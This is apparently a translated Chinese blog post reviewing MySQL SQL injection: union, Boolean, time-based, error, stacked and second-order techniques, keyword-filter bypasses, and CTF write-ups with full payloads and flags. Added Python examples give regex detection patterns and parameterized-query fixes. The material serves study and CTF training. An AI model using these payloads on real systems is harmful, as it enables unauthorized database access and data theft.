SQL injection basic knowledge review

Basic knowledge of SQL injection

1. Database-related knowledge

1.1 information_schema: MySQL default database

  • SCHEMATA:
    Stores the names of all databases created by the user.
    Database name ----- SCHEMA_NAME
  • TABLES:
    Stores the database name and table name of every table created by the user.
    Database name ----- TABLE_SCHEMA    Table name ----- TABLE_NAME
  • COLUMNS:
    Stores the database name, table name and column name of every column created by the user.
    Database name ----- TABLE_SCHEMA    Table name ----- TABLE_NAME
    Column name ----- COLUMN_NAME

1.2 MySQL query statements

  • SELECT column_name FROM database_name.table_name
  • SELECT column_name FROM database_name.table_name WHERE known_column='known value'
  • SELECT column_name FROM database_name.table_name WHERE known_column1='known value 1' AND known_column2='known value 2'

2. Attack method

2.1 Union injection

  1. Use order by to find the number of columns the query returns
    Example: id=1 order by 3 returns the same page as id=1, while id=1 order by 4 returns a different page, so the query has 3 columns.
  2. Use union select to find the display positions
    Example: id=-1 union select 1,2,3; if the page shows 2 and 3, positions 2 and 3 are the display points where a MySQL expression can be placed.
  3. MySQL statements
    Example: first use database() at position 2 to get the current database name ('sql'), then query one table name of that database ('emails'), then, with the database and table name known, query a column name ('email_id'), and finally read the required data.
id = 1 union select 1,database(),3
id = 1 union select 1,(select table_name from information_schema.tables where table_schema='sql' limit 0,1),3
id = 1 union select 1,(select column_name from information_schema.columns where table_schema='sql' and table_name='emails' limit 0,1),3
id = 1 union select 1,(select email_id from sql.emails limit 0,1),3

2.2Boolean injection

  1. When the page does not display data from the database, try Boolean injection
  2. Determine the length of the database name: try different values of n and read the length off the page's return state
id = '1' and length(database()) >= n --+
  3. Guess the database name character by character (the variable can be brute-forced with Burp Suite); the same method determines the table name
id = '1' and substr(database(),1,1)='t' --+
id = '1' and substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='e' --+

Time-based form

id = '1' and if(substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='e',sleep(3),1) --+

2.3 Error injection

  1. Use the error message returned by the page together with functions such as updatexml() to extract data.
    Example: use updatexml() to get a table name of the database test
  ' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)--+

2.4 Stacked query injection

1. Judgment condition: if id=1' shows a MySQL error and id=1'# returns the normal page, stacked injection can be tried
2. Injection code example

id = '1';select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(3),1)%23
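The detection side of sections 2.1 to 2.4, as an added example that is not part of the original post: a small classifier that URL-decodes the query string of each access-log line and labels the union, Boolean, time-based, error-based and stacked shapes described above. The log lines and the regular expressions are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# One pattern per technique in sections 2.1-2.4 (plus the information_schema lookups they all rely on).
SIGNATURES = {
    "union":   re.compile(r"\bunion\b[\s(]+.*\bselect\b|\border\s+by\s+\d+"),
    "boolean": re.compile(r"\b(?:and|or)\b[\s(]+(?:length|substr|ascii)\s*\("),
    "time":    re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "error":   re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "stacked": re.compile(r";\s*(?:select|show|rename|alter|insert|update|drop)\b"),
    "schema":  re.compile(r"information_schema\."),
}

def normalize(query_string: str) -> str:
    """URL-decode twice (catches double encoding) and fold case, which defeats the 3.1 case bypass."""
    return unquote_plus(unquote_plus(query_string)).lower()

def classify(log_line: str) -> list[str]:
    """Return the technique labels matched by one access-log line (empty if nothing matched)."""
    m = re.search(r'"(?:GET|POST)\s+\S*\?(\S*)\s', log_line)
    if not m:
        return []
    decoded = normalize(m.group(1))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines: list[str]) -> dict[str, list[str]]:
    """Map each suspicious request line to the techniques it matched."""
    return {line.split('"')[1]: hits for line in lines if (hits := classify(line))}

# Constructed access-log lines modelled on the payload shapes in sections 2.1-2.4 (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /2.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /2.php?id=-1%20UNION%20SELECT%201,database(),3 HTTP/1.1" 200 530',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /2.php?id=1%27%20and%20length(database())%3E%3D5%20--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /2.php?id=1%27;select%20if(1=1,sleep(3),1)%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /2.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20limit%200,1),0x7e),1)--+ HTTP/1.1" 500 220',
]

if __name__ == "__main__":
    for request, hits in scan(SAMPLE_LOG).items():
        print(f"{', '.join(hits):<16} {request}")
```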

2.5 Secondary injection

  1. 1.php (registration page) code analysis
<?php
$con=mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_errno())
{
    echo "连接失败:".mysqli_connect_error();
}
$username = $_GET['username'];
$password = $_GET['password'];
$result = mysqli_query($con,"insert into users(`username`,`password`) values('".addslashes($username)."','".md5($password)."')");
echo "新id为:".mysqli_insert_id($con);
?>
  • The page takes the username and password parameters via GET and splices them into the insert statement
  • The username parameter is escaped with addslashes($username)
    addslashes() example: o'reilly ----> o\'reilly; the backslash is only an escape, so the value stored in the database is o'reilly
  • The password parameter is hashed with md5 and inserted into the database
  • After registration the page returns the new id
  2. 2.php (access page) code analysis
<?php
$con=mysqli_connect("localhost","root","123456","test");
if (mysqli_connect_errno())
{
    echo "连接失败:".mysqli_connect_error();
}
$id =intval($_GET['id']);
$result = mysqli_query($con,"select * from users where `id`=".$id);
$row = mysqli_fetch_array($result);
$username = $row['username'];
$result2 = mysqli_query($con,"select * from person where `username`='".$username."'");
if($row2 = mysqli_fetch_array($result2)){
    echo $row2['username'].":".$row2['money'];
}
else{
    echo mysqli_error($con);
}
?>
  • The id parameter is taken via GET and passed through intval(), so an integer is spliced into the SQL that reads the username from the users table
  • The username read back is then spliced directly into the query against the person table

Injection example
Use the error produced by test' in 2.php to query the content after the union
1. First try 1.php?username=test'. The returned id is 21, and visiting 2.php?id=21 reports an error
2. Then try 1.php?username=test' order by n%23 and visit the corresponding id in 2.php to determine how many columns the table has
3. Assuming there are 3 columns, visit 1.php?username=test' union select 1,user(),3%23,
get the new id=40, and visit 2.php?id=40 to get the result of user()
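An added example, not the post's own 1.php/2.php, that reproduces the second-order flaw in SQLite (standing in for MySQL) and puts the hardened form beside it: the value is bound as a parameter both when it is inserted and again when it is read back and reused. The sample tables and the name o'reilly are constructed.

```python
import sqlite3

def setup() -> sqlite3.Connection:
    """In-memory stand-in for the post's 'sql'/'test' databases (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table users(id integer primary key, username text, password text);
        create table person(username text, money integer);
        insert into person values ('o''reilly', 100), ('admin', 999);
    """)
    return con

def register(con: sqlite3.Connection, username: str) -> int:
    """1.php's insert with a bound parameter: no addslashes() needed, the quote is stored as data."""
    cur = con.execute("insert into users(username, password) values (?, ?)", (username, "x"))
    return cur.lastrowid

def stored_username(con: sqlite3.Connection, uid: int) -> str:
    """What 2.php reads back: escaping never reaches storage, so the raw quote comes back."""
    return con.execute("select username from users where id = ?", (uid,)).fetchone()[0]

def lookup_money_unsafe(con: sqlite3.Connection, uid: int):
    """2.php as written: the stored name is spliced into the second query. Trusting a value
    because it came from the database is the second-order mistake."""
    name = stored_username(con, uid)
    return con.execute(f"select username, money from person where username='{name}'").fetchone()

def lookup_money_safe(con: sqlite3.Connection, uid: int):
    """Hardened 2.php: the value read back is bound again, so a quote stays a quote."""
    name = stored_username(con, uid)
    return con.execute("select username, money from person where username = ?", (name,)).fetchone()

def demo(username: str = "o'reilly") -> tuple:
    """Register a legitimate name containing a quote and run both lookups.
    Returns (safe_result, unsafe_error_message)."""
    con = setup()
    uid = register(con, username)
    try:
        unsafe = lookup_money_unsafe(con, uid)
        error = None if unsafe else "no row"
    except sqlite3.OperationalError as exc:   # the error the writeup sees at 2.php?id=21
        error = f"syntax error: {exc}"
    return lookup_money_safe(con, uid), error

if __name__ == "__main__":
    safe, unsafe_error = demo()
    print("safe lookup:  ", safe)          # ('o'reilly', 100)
    print("unsafe lookup:", unsafe_error)  # the concatenated query fails to parse
```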

3. SQL injection bypass

3.1 Case bypass injection

Example:
Visiting id=1 and 1=1 returns "no hacker", so the keyword is obviously filtered; try id=1 And 1=1, etc.

3.2 Double-write bypass injection

Example:
Visiting id=1 and 1=1 makes the page report a MySQL error. The error message shows that "and 1=1" has become "1=1", i.e. the keyword and is removed. Bypass it by writing the keyword twice: id=1 aandnd 1=2;
or ==> oorr, From ==> FFromrom, etc.

4. A few simple example problems

4.1 [Geek Challenge 2019] LoveSQL problem-solving ideas

  • Try union injection: first determine the number of columns with 1'order by 3# and 1'order by 4#; the pages returned differ, so there are 3 columns.
  • Then find the display positions with 1'union select 1,2,3#
  • Then use position 3 of union select 1,2,3# to get the database information
payload: 1' union select 1,2,database()#
payload: 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"#
payload: 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"#
payload: 1' union select 1,2,group_concat(password) from l0ve1ysq1#

This gives the flag.

4.2 [Geek Challenge 2019] BabySQL

The idea is the same as 4.1, with double-write bypass added on top of it; straight to the payload for each step.
Find display positions -> query database -> query table name -> query column name -> query password to get the flag

1' uniounionn selecselectt 1,2,3#   
1' uniounionn selecselectt 1,2,database()# 
1' uniounionn selecselectt 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema="geek"#
1' uniounionn selecselectt 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name="b4bsql"#
1' uniounionn selecselectt 1,2,group_concat(passwoorrd) frofromm b4bsql#
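Added example, not from the original post, showing why the double-written payloads in 3.2 and 4.2 (and the case variation in 3.1) get past a keyword-stripping filter: one pass of removal beside a fixed-point version and a reject-rather-than-rewrite check. The keyword list and inputs are constructed.

```python
import re

# The blacklist a 3.2-style filter removes; case-insensitive matching closes the 3.1 case bypass.
KEYWORDS = ("union", "select", "from", "where", "and", "or")
PATTERN = re.compile("|".join(KEYWORDS), re.IGNORECASE)

def filter_once(value: str) -> str:
    """The vulnerable sanitizer: a single pass of keyword removal.
    'uniounionn' loses its inner 'union' and the outer letters close up to spell 'union' again."""
    return PATTERN.sub("", value)

def filter_fixpoint(value: str) -> str:
    """Strip until nothing changes, so nested keywords cannot reassemble."""
    while True:
        stripped = PATTERN.sub("", value)
        if stripped == value:
            return value
        value = stripped

def is_blacklisted(value: str) -> bool:
    """Preferred use of the list: reject anything it would alter instead of rewriting it
    (silent rewriting also mangles legitimate data such as 'Orlando') and bind the value
    as a query parameter. The blacklist is a tripwire; parameter binding is the control."""
    return filter_fixpoint(value) != value

# Constructed inputs: the double-written payloads from 3.2/4.2, a case-varied one from 3.1, and a clean id.
SAMPLES = ("1' uniounionn selecselectt 1,2,3#", "1 aandnd 1=1", "1 AnD 1=1", "42")

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:40} once={filter_once(sample)!r:28} fixpoint={filter_fixpoint(sample)!r}")
```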

4.3 [强网杯2019] Betting casually

  • Try union injection and find that the keywords are filtered
  • Try stacked injection
  • The idea: list the databases -> list the tables -> list the columns
payload: 1';show databases;#
payload: 1';show tables;#
payload: 1';show columns from words;#
payload: 1';show columns from `1919810931114514`;#

It turns out the backend queries the words table by default, so the tables can be renamed to make the page display the 1919810931114514 table instead

payload: 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table  `words` change `flag` `id` varchar(100);#

1'or 1=1# then gets the flag.

4.4 [Geek Challenge 2019] HardSQL (error-based injection)

Problem-solving ideas
1. Try union injection by hand and find that union select, spaces and other characters are filtered
2. Try error-based injection.
Use () in place of the filtered spaces, use like in place of =, and write SELECT in uppercase
3. Get the database name, table name and column name in turn
4. Finally, when getting the flag:

admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(password))from(H4rDsq1)),0x7e),1))#

The injection above returns only part of the flag, presumably because of a character limit, so add left() and right().

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek")),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(right(password,25)))from(H4rDsq1)),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(SELECT(group_concat(left(password,25)))from(H4rDsq1)),0x7e),1))#

This gives the flag

flag{2e150fa9-e37c-4fb6-acb7-c89f5e0cdf39}

4.5 [GXYCTF2019] BabySQli

  • Enter any password and capture the packet
  • It gives a base32-encoded hint; decode base32 and then base64 to get
  • select * from user where username = '$name'
  • First determine the number of columns. I tried
    1' orderby 3#
    and found that orderby was filtered, so I tried the uppercase bypass and determined that there are 3 columns.
  • Try the universal password
  • As expected: do not hack me!
  • Thought it was filtering, tried various bypasses
  • Then I chose to look at the source code (tcl...)
if (!$result) {
	printf("Error: %s\n", mysqli_error($con));
	exit();
}
else{
	// echo '<pre>';
	$arr = mysqli_fetch_row($result);
	// print_r($arr);
	if($arr[1] == "admin"){
		if(md5($password) == $arr[2]){
			echo $flag;
		}
		else{
			die("wrong pass!");
		}
	}
	else{
		die("wrong user!");
	}
}
  • It means the second field of the select result must equal admin and the third field must equal the md5 of the password
  • Choose the password 123, whose md5 is 202cb962ac59075b964b07152d234b70
  • So the payload is as follows
username: wtcl' union select 1,'admin','202cb962ac59075b964b07152d234b70'#
password: 123

Get the flag! Thinking back, the problem is not hard.

Source: blog.csdn.net/CyhDl666/article/details/112644263